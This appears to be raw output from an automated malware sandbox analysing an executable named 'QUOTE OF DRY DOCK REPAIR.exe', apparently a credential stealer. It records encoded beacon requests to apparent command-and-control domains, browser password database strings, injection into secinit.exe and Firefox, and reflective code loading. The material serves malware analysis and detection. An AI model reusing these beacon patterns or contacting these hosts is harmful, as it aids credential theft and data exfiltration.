Source: global traffic	HTTP traffic detected: GET /5l58/?v0vHVXch=mzKLqUgWNSOc0HClXj1DYw25iXyF4NDDzKLO7iktqSi1e8VIoGhrLQ80YJoT2UJy6ZdaxC2wU3x58VDwsjwy75MJV3VtnNq0OSNjen8RmThW2Bit8HxG0xB8ZqPFXeAi4g==&p6=QbAHL HTTP/1.1Host: www.autonomousrich.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Win64; x64; Trident/6.0; MASMJS)
Source: global traffic	HTTP traffic detected: GET /eee1/?v0vHVXch=n9kO9VSsPKocZxga8wMP7ZC/yNhYo/MYHbvIjRRvOevNyFmmshV66n7ll9r5u+VXxmlOglvHHE9+Zbjf/X+X+gqcpnFv5fdVnQSXxkRXfk4Q5CwHoK9c2oYwmaFtGgt8pA==&p6=QbAHL HTTP/1.1Host: www.corellia.proAccept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Win64; x64; Trident/6.0; MASMJS)
Source: global traffic	HTTP traffic detected: GET /uh6l/?v0vHVXch=Mn5nmS7lt2cJv9+j3CMiNhEemX3QITMS/F2DenFwe1qv1kNVBB5tqqxJB3hy6pNsqYRk/upKv3VafJyVIX+E+JOpF5ujFyUEP10/qh9abOs5e1YZkQ82+XPFdj6YkIe/jw==&p6=QbAHL HTTP/1.1Host: www.jili999.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Win64; x64; Trident/6.0; MASMJS)
Source: global traffic	HTTP traffic detected: GET /9gbf/?v0vHVXch=7DiB6jlyU+paO1o58s+DX3hfP+myCYHTCYOxRO7xdHcpVTYS08y98PrQFHajmlx8OtsblaN8ktXP++GHrTfkN1cENoNQst8ZrMbcqtyTZjPN0CQwG08kvbRGrQkhDLtdrQ==&p6=QbAHL HTTP/1.1Host: www.031234990.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Win64; x64; Trident/6.0; MASMJS)
Source: global traffic	HTTP traffic detected: GET /ljgq/?v0vHVXch=uySAa/UDxqgJ/4PqEkK7nZzM3sD1o4rp4B6SkkbqTei4TBmBP9A2PfF8Ub2uALcJeY1EAEDqGaKWstg01TGw/Ai/kc9ROzc6RPAtg+5J64JXZg+PLNFuxslVx+UGMMfrqg==&p6=QbAHL HTTP/1.1Host: www.arryongro-nambe.liveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Win64; x64; Trident/6.0; MASMJS)
Source: global traffic	HTTP traffic detected: GET /7t9z/?v0vHVXch=wyNQ9vyBSlseFmSyt6164mnlviTJlOQFCf4ZHO7/3QLnmmjTY2PuAWWuPLMht4Ka7tmw8sdpmIb5omdfJ67WerkzoFBUXIoSPKfuI7eAxP8/0oDms45XeWbOihAW0n7eMg==&p6=QbAHL HTTP/1.1Host: www.theweb.servicesAccept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Win64; x64; Trident/6.0; MASMJS)

Source: global traffic	DNS traffic detected: DNS query: www.physicsbrain.xyz
Source: global traffic	DNS traffic detected: DNS query: www.bydotoparca.net
Source: global traffic	DNS traffic detected: DNS query: www.car-select.online
Source: global traffic	DNS traffic detected: DNS query: www.topked.top
Source: global traffic	DNS traffic detected: DNS query: www.autonomousrich.xyz
Source: global traffic	DNS traffic detected: DNS query: www.corellia.pro
Source: global traffic	DNS traffic detected: DNS query: www.jili999.net
Source: global traffic	DNS traffic detected: DNS query: www.031234990.xyz
Source: global traffic	DNS traffic detected: DNS query: www.arryongro-nambe.live
Source: global traffic	DNS traffic detected: DNS query: www.avisos-bbva.info
Source: global traffic	DNS traffic detected: DNS query: www.theweb.services

Source: secinit.exe, 00000006.00000003.2022229928.0000000003193000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE logins (origin_url VARCHAR NOT NULL, action_url VARCHAR, username_element VARCHAR, username_value VARCHAR, password_element VARCHAR, password_value BLOB, submit_element VARCHAR, signon_realm VARCHAR NOT NULL, date_created INTEGER NOT NULL, blacklisted_by_user INTEGER NOT NULL, scheme INTEGER NOT NULL, password_type INTEGER, times_used INTEGER, form_data BLOB, display_name VARCHAR, icon_url VARCHAR, federation_url VARCHAR, skip_zero_click INTEGER, generation_upload_status INTEGER, possible_username_pairs BLOB, id INTEGER PRIMA`;
Source: secinit.exe, 00000006.00000002.3893050955.00000000031EC000.00000004.00000020.00020000.00000000.sdmp, secinit.exe, 00000006.00000003.2022155206.00000000031CC000.00000004.00000020.00020000.00000000.sdmp, secinit.exe, 00000006.00000002.3893050955.00000000031B4000.00000004.00000020.00020000.00000000.sdmp, secinit.exe, 00000006.00000003.2022229928.00000000031B4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: unknown	Process created: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe "C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe"
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Process created: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe "C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe"
Source: C:\Program Files (x86)\LWWwxbNafaIegGXnYXVPyHPZTWHilIvipowzmLlzTVEpKJhHAYtydWRXOwxbBu\fVnaqDZrZDB.exe	Process created: C:\Windows\SysWOW64\secinit.exe "C:\Windows\SysWOW64\secinit.exe"
Source: C:\Windows\SysWOW64\secinit.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Process created: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe "C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe"	Jump to behavior
Source: C:\Program Files (x86)\LWWwxbNafaIegGXnYXVPyHPZTWHilIvipowzmLlzTVEpKJhHAYtydWRXOwxbBu\fVnaqDZrZDB.exe	Process created: C:\Windows\SysWOW64\secinit.exe "C:\Windows\SysWOW64\secinit.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\secinit.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Section loaded: iconcodecservice.dll	Jump to behavior
Source: C:\Windows\SysWOW64\secinit.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\secinit.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\secinit.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\secinit.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\secinit.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\secinit.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\secinit.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\secinit.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\secinit.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\secinit.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\secinit.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\secinit.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\secinit.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\secinit.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\secinit.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\secinit.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\secinit.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\secinit.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\secinit.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\secinit.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\secinit.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\secinit.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\secinit.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\LWWwxbNafaIegGXnYXVPyHPZTWHilIvipowzmLlzTVEpKJhHAYtydWRXOwxbBu\fVnaqDZrZDB.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\LWWwxbNafaIegGXnYXVPyHPZTWHilIvipowzmLlzTVEpKJhHAYtydWRXOwxbBu\fVnaqDZrZDB.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\LWWwxbNafaIegGXnYXVPyHPZTWHilIvipowzmLlzTVEpKJhHAYtydWRXOwxbBu\fVnaqDZrZDB.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\LWWwxbNafaIegGXnYXVPyHPZTWHilIvipowzmLlzTVEpKJhHAYtydWRXOwxbBu\fVnaqDZrZDB.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\LWWwxbNafaIegGXnYXVPyHPZTWHilIvipowzmLlzTVEpKJhHAYtydWRXOwxbBu\fVnaqDZrZDB.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\LWWwxbNafaIegGXnYXVPyHPZTWHilIvipowzmLlzTVEpKJhHAYtydWRXOwxbBu\fVnaqDZrZDB.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: QUOTE OF DRY DOCK REPAIR.exe, DependencyPropertyWeaverTask.cs	.Net Code: Execute System.Reflection.Assembly.Load(byte[])
Source: 0.2.QUOTE OF DRY DOCK REPAIR.exe.7480000.5.raw.unpack, RK.cs	.Net Code: _206F_200B_206F_206E_200F_206F_200F_202A_200D_200F_200F_202B_206F_200B_200B_200C_200B_200B_200E_206C_200F_206E_200E_206A_200F_200B_206B_206F_200F_206E_200F_200F_206D_206C_202C_202D_206F_202D_200B_202C_202E System.Reflection.Assembly.Load(byte[])
Source: 0.2.QUOTE OF DRY DOCK REPAIR.exe.4b3e498.2.raw.unpack, sCeuj9YajSgfkVDsdu.cs	.Net Code: VyEFjJAtu8 System.Reflection.Assembly.Load(byte[])
Source: 0.2.QUOTE OF DRY DOCK REPAIR.exe.40c8088.3.raw.unpack, RK.cs	.Net Code: _206F_200B_206F_206E_200F_206F_200F_202A_200D_200F_200F_202B_206F_200B_200B_200C_200B_200B_200E_206C_200F_206E_200E_206A_200F_200B_206B_206F_200F_206E_200F_200F_206D_206C_202C_202D_206F_202D_200B_202C_202E System.Reflection.Assembly.Load(byte[])
Source: 0.2.QUOTE OF DRY DOCK REPAIR.exe.4bc90b8.1.raw.unpack, sCeuj9YajSgfkVDsdu.cs	.Net Code: VyEFjJAtu8 System.Reflection.Assembly.Load(byte[])
Source: 0.2.QUOTE OF DRY DOCK REPAIR.exe.8010000.6.raw.unpack, sCeuj9YajSgfkVDsdu.cs	.Net Code: VyEFjJAtu8 System.Reflection.Assembly.Load(byte[])
Source: 0.2.QUOTE OF DRY DOCK REPAIR.exe.40e80a8.4.raw.unpack, RK.cs	.Net Code: _206F_200B_206F_206E_200F_206F_200F_202A_200D_200F_200F_202B_206F_200B_200B_200C_200B_200B_200E_206C_200F_206E_200E_206A_200F_200B_206B_206F_200F_206E_200F_200F_206D_206C_202C_202D_206F_202D_200B_202C_202E System.Reflection.Assembly.Load(byte[])
Source: 6.2.secinit.exe.3cacd14.2.raw.unpack, DependencyPropertyWeaverTask.cs	.Net Code: Execute System.Reflection.Assembly.Load(byte[])
Source: 9.2.fVnaqDZrZDB.exe.26ccd14.1.raw.unpack, DependencyPropertyWeaverTask.cs	.Net Code: Execute System.Reflection.Assembly.Load(byte[])

Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_0041F003 pushfd ; iretd	3_2_0041F01B
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_00414086 push esi; ret	3_2_00414095
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_00417939 push FFFFFFD7h; retf	3_2_0041793E
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_0040DA26 push es; iretd	3_2_0040DA2E
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_00418AD8 pushad ; iretd	3_2_00418ADF
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_0041940F push edx; ret	3_2_00419411
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_00419416 push edi; retf	3_2_00419417
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_004075C0 push esi; retf	3_2_004075C8
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_0040AD9E push ebp; retf	3_2_0040AD9F
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_0040D5AD push 43AEBFE9h; ret	3_2_0040D5B9
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_00418654 push ds; ret	3_2_00418656
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_00403660 push eax; ret	3_2_00403662
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_00401669 push eax; retf	3_2_0040166A
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_0040760B push ebx; iretd	3_2_0040760D
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_0041D612 pushfd ; ret	3_2_0041D620
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_00414EC6 push esp; ret	3_2_00414EC7
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_00401FEE pushad ; retf	3_2_00401FEF
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_0165225F pushad ; ret	3_2_016527F9
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_016527FA pushad ; ret	3_2_016527F9
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_016809AD push ecx; mov dword ptr [esp], ecx	3_2_016809B6
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_0165283D push eax; iretd	3_2_01652858
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_01659939 push es; iretd	3_2_01659940
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_0368135E push eax; iretd	6_2_03681369
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_0368225F pushad ; ret	6_2_036827F9
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_0368B008 push es; iretd	6_2_0368B009
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_036827FA pushad ; ret	6_2_036827F9
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_03689939 push es; iretd	6_2_03689940
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_036B09AD push ecx; mov dword ptr [esp], ecx	6_2_036B09B6
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_0368283D push eax; iretd	6_2_03682858
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_02EC42D6 push FFFFFFD7h; retf	6_2_02EC42DB
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_02ED13C2 push cs; ret	6_2_02ED13D9

Source: 0.2.QUOTE OF DRY DOCK REPAIR.exe.4b3e498.2.raw.unpack, oPxlmZ016lsAH94Ydd.cs	High entropy of concatenated method names: 'Sjl9sxJk8o', 'e079PJQqeU', 'nP69KpA1X1', 'Lr99kmsqXY', 'gHe9YTImuC', 'iQCKf9RkLb', 'yXlKrgYar0', 'O3DKCcKjt4', 'EGXKw16UXA', 'LaGKEwFEZR'
Source: 0.2.QUOTE OF DRY DOCK REPAIR.exe.4b3e498.2.raw.unpack, RiPtXXz7oxRulhfgL3.cs	High entropy of concatenated method names: 'gJBhMU9jLf', 'eUshZQ51Ox', 'z5PhtXY9d8', 'M4rh0JUgAV', 'uEfhDPcs6T', 'EKNhAIYkHC', 'NqxhJpvk39', 'JiChy5mUi6', 'QZ8hmO7LNj', 'UHThVXiXUR'
Source: 0.2.QUOTE OF DRY DOCK REPAIR.exe.4b3e498.2.raw.unpack, YsZIgYpKH5sL5PKqQB.cs	High entropy of concatenated method names: 'Th5SZhM9sY', 'qEcSttZihT', 'qvlS0c3p5H', 'nmISDv3pZv', 'GaBSADMvEP', 'Ts6SJFRnht', 'lyBSi5MwuF', 'rXtSa5qLxm', 'xMHSgGaUJH', 'kqISlpA6hn'
Source: 0.2.QUOTE OF DRY DOCK REPAIR.exe.4b3e498.2.raw.unpack, SvSASrE81IIM5ckJ8h.cs	High entropy of concatenated method names: 'Kp5N03aP2Q', 'K2ZNDmgv0u', 'KqLN5t9suv', 'asANA6M6Nx', 'NTeNJLoBHe', 'S7aNU3bS2x', 'NU2NiYyxNt', 'Kw0NahbASM', 'npaN7d1fGf', 'plZNg9JPKn'
Source: 0.2.QUOTE OF DRY DOCK REPAIR.exe.4b3e498.2.raw.unpack, EBdUrho7llOUOWMMam.cs	High entropy of concatenated method names: 'CMtKb1Cqth', 'xd0KqqJmi8', 'vQJx5w82ay', 'qUTxA8dr5o', 'PwaxJvH3Yu', 'UY8xUCMkML', 'EVmxiCrqQX', 'zPdxaNL6kt', 'H8qx7p3TvC', 'HUIxg2FsSA'
Source: 0.2.QUOTE OF DRY DOCK REPAIR.exe.4b3e498.2.raw.unpack, dAac7cWQV3o8MffK5qK.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'aoKhlrx7nV', 'agWh8EGMie', 'Gbhhp93buC', 'LrdhnNEG3F', 'm8EhOEgMRl', 'NKRhTRIKre', 'uvYh101co1'
Source: 0.2.QUOTE OF DRY DOCK REPAIR.exe.4b3e498.2.raw.unpack, jvrEcuxWt9tGGMiX8w.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'ykcBETUhdA', 'X8jBvYRN4V', 'bC2BzwZVwc', 'NYN6Qx33qI', 'XBU6WYE5jj', 'NE16BJk1yL', 'nxN66dBfEA', 'UNNnhJ2g52Ef0oBRcFk'
Source: 0.2.QUOTE OF DRY DOCK REPAIR.exe.4b3e498.2.raw.unpack, s3vFmGWWU6Cp4e86jvc.cs	High entropy of concatenated method names: 'UbehvHH0ew', 'UNMhzSsPgb', 'pbBIQ6ua74', 'IAQIWghyW0', 'kgJIB9e7oK', 'GOeI6NnD2q', 'ivWIFZhP6w', 'knvIsARKVZ', 'XI6IclIGU8', 'bT8IPmt5FR'
Source: 0.2.QUOTE OF DRY DOCK REPAIR.exe.4b3e498.2.raw.unpack, sneeQftREhj3FL0tmR.cs	High entropy of concatenated method names: 'MTqxXIqwLr', 'lJQxMcmRSi', 'WQhxZwi8v9', 'AFtxtk0wkE', 'BYRx2Q1dTC', 'C6jx40JfgA', 'W4jxdDtPra', 'Q1ExehkFWT', 'sKHxN5d6h5', 'LdbxhUVkVv'
Source: 0.2.QUOTE OF DRY DOCK REPAIR.exe.4b3e498.2.raw.unpack, zltkGPZnD9ZwEclvOo.cs	High entropy of concatenated method names: 'K5dPn5GESZ', 'ELIPO8pyZo', 'HS5PTlPo9V', 'BwwP1ZvP7x', 'IGJPfbJrAg', 'jI5PrnRIME', 'TUbPCm6uqA', 'qdxPwMamQF', 'BQ5PEdyMGF', 'zv0PvjCVKJ'
Source: 0.2.QUOTE OF DRY DOCK REPAIR.exe.4b3e498.2.raw.unpack, y3bqj7rPj2jLldCL42.cs	High entropy of concatenated method names: 'SNpdwJ6ob3', 'lvsdv7heJZ', 'F4BeQk3vPB', 'nnCeWFTlF5', 'RTudlDhbn2', 'Q2gd87MBQx', 'q8DdpjS4Vv', 'KSYdnXdFZ3', 'clXdOhOk0S', 'QBqdT9R31W'
Source: 0.2.QUOTE OF DRY DOCK REPAIR.exe.4b3e498.2.raw.unpack, sCeuj9YajSgfkVDsdu.cs	High entropy of concatenated method names: 'lZc6sg2nke', 'vQV6cWorOE', 'xH96PAhYBU', 'sCq6x6q2JH', 'Va76KTZRuE', 'i6r69WcCpW', 'jKv6kYDrF7', 'g2j6YvlpFc', 'ebS6LEacso', 'S6r6RZhtqW'
Source: 0.2.QUOTE OF DRY DOCK REPAIR.exe.4b3e498.2.raw.unpack, Ppmk7ITip6N03X2Jqt.cs	High entropy of concatenated method names: 'ToString', 'txx4lfruuy', 'Yk04DsX4FJ', 'CZk45PJRuS', 'rg14AY2sBo', 'hJO4J3eG7Q', 'jRq4U7sSxd', 'NLT4iwWHVI', 'KfB4aPKYNV', 'AaC47oAu7Y'
Source: 0.2.QUOTE OF DRY DOCK REPAIR.exe.4b3e498.2.raw.unpack, tX60aHWFd5YWuCpNBjM.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'v0xuNCDEtO', 'C30uhYSSv3', 'bDjuIcvbfP', 'FYNuuOxMTk', 'IMsu3puGe8', 'QZIuHElBjl', 'FGquy9EAS8'
Source: 0.2.QUOTE OF DRY DOCK REPAIR.exe.4b3e498.2.raw.unpack, SNLl3CCsP5sX1XdMA0.cs	High entropy of concatenated method names: 'AVYN2jdnOV', 'FgKNd8TU4R', 'wffNN6GJJt', 'ClNNI2oyDV', 'e2dN3esLka', 'I8DNy8s6ip', 'Dispose', 'zPgec3Su0t', 'ABWePANPhl', 'cvHexnwdAW'
Source: 0.2.QUOTE OF DRY DOCK REPAIR.exe.4b3e498.2.raw.unpack, N21qCtPKexS6stg8J6.cs	High entropy of concatenated method names: 'Dispose', 'HsXWE1XdMA', 'BLaBDRe2Kk', 'm545UO1K8X', 'FAeWv4AghU', 'hiaWzR6J0R', 'ProcessDialogKey', 'mYOBQvSASr', 'O1IBWIM5ck', 'J8hBBHdiWi'
Source: 0.2.QUOTE OF DRY DOCK REPAIR.exe.4b3e498.2.raw.unpack, FbVk2S7NRvVZLxDfc3.cs	High entropy of concatenated method names: 'JD2kml4mpn', 'DDSkVh4APY', 'LNpkjRgl6I', 'ivpkXffHCN', 'cWokbBQGYe', 'BVPkMGIKKl', 'A4NkqmUrS9', 'D6qkZyghqk', 'TrYktl3B7s', 'Lf9kowOpuM'
Source: 0.2.QUOTE OF DRY DOCK REPAIR.exe.4b3e498.2.raw.unpack, t3bNguFeFG5fL40fFF.cs	High entropy of concatenated method names: 'L3jWkltkGP', 'RD9WYZwEcl', 'UREWRhj3FL', 'FtmWGRtBdU', 'aMMW2amSPx', 'OmZW416lsA', 'P6YEy1icbsfc1QTZlF', 'lCfJ7XEjr1DvvUBAie', 'x7gWWhgudp', 'LB4W6wm3x9'
Source: 0.2.QUOTE OF DRY DOCK REPAIR.exe.4b3e498.2.raw.unpack, JBcCvYiYQt0X2dIWsl.cs	High entropy of concatenated method names: 'U0CkcVZWON', 'NdDkxMX0GB', 'vapk9xuOuE', 'OCX9vd6X9e', 'unh9zhXn1f', 'ndSkQV0OlY', 'MpHkWAHg4A', 'kH5kBBfsIm', 'hTrk6VNLUQ', 'tvxkFVy6C6'
Source: 0.2.QUOTE OF DRY DOCK REPAIR.exe.4b3e498.2.raw.unpack, vmPGApBGgOE6mDPqkv.cs	High entropy of concatenated method names: 'RbHjiasLk', 'lcTXcqFdx', 'Og4MxKyj2', 'F9OqMGoNZ', 'To2tBNqaV', 'Q1CoYaZQL', 'jXJWlGoMfIfkhLRn8i', 'SGoEqS1qwSWZDY1W7H', 'lOveOUSau', 'mxeh277P9'
Source: 0.2.QUOTE OF DRY DOCK REPAIR.exe.4bc90b8.1.raw.unpack, oPxlmZ016lsAH94Ydd.cs	High entropy of concatenated method names: 'Sjl9sxJk8o', 'e079PJQqeU', 'nP69KpA1X1', 'Lr99kmsqXY', 'gHe9YTImuC', 'iQCKf9RkLb', 'yXlKrgYar0', 'O3DKCcKjt4', 'EGXKw16UXA', 'LaGKEwFEZR'
Source: 0.2.QUOTE OF DRY DOCK REPAIR.exe.4bc90b8.1.raw.unpack, RiPtXXz7oxRulhfgL3.cs	High entropy of concatenated method names: 'gJBhMU9jLf', 'eUshZQ51Ox', 'z5PhtXY9d8', 'M4rh0JUgAV', 'uEfhDPcs6T', 'EKNhAIYkHC', 'NqxhJpvk39', 'JiChy5mUi6', 'QZ8hmO7LNj', 'UHThVXiXUR'
Source: 0.2.QUOTE OF DRY DOCK REPAIR.exe.4bc90b8.1.raw.unpack, YsZIgYpKH5sL5PKqQB.cs	High entropy of concatenated method names: 'Th5SZhM9sY', 'qEcSttZihT', 'qvlS0c3p5H', 'nmISDv3pZv', 'GaBSADMvEP', 'Ts6SJFRnht', 'lyBSi5MwuF', 'rXtSa5qLxm', 'xMHSgGaUJH', 'kqISlpA6hn'
Source: 0.2.QUOTE OF DRY DOCK REPAIR.exe.4bc90b8.1.raw.unpack, SvSASrE81IIM5ckJ8h.cs	High entropy of concatenated method names: 'Kp5N03aP2Q', 'K2ZNDmgv0u', 'KqLN5t9suv', 'asANA6M6Nx', 'NTeNJLoBHe', 'S7aNU3bS2x', 'NU2NiYyxNt', 'Kw0NahbASM', 'npaN7d1fGf', 'plZNg9JPKn'
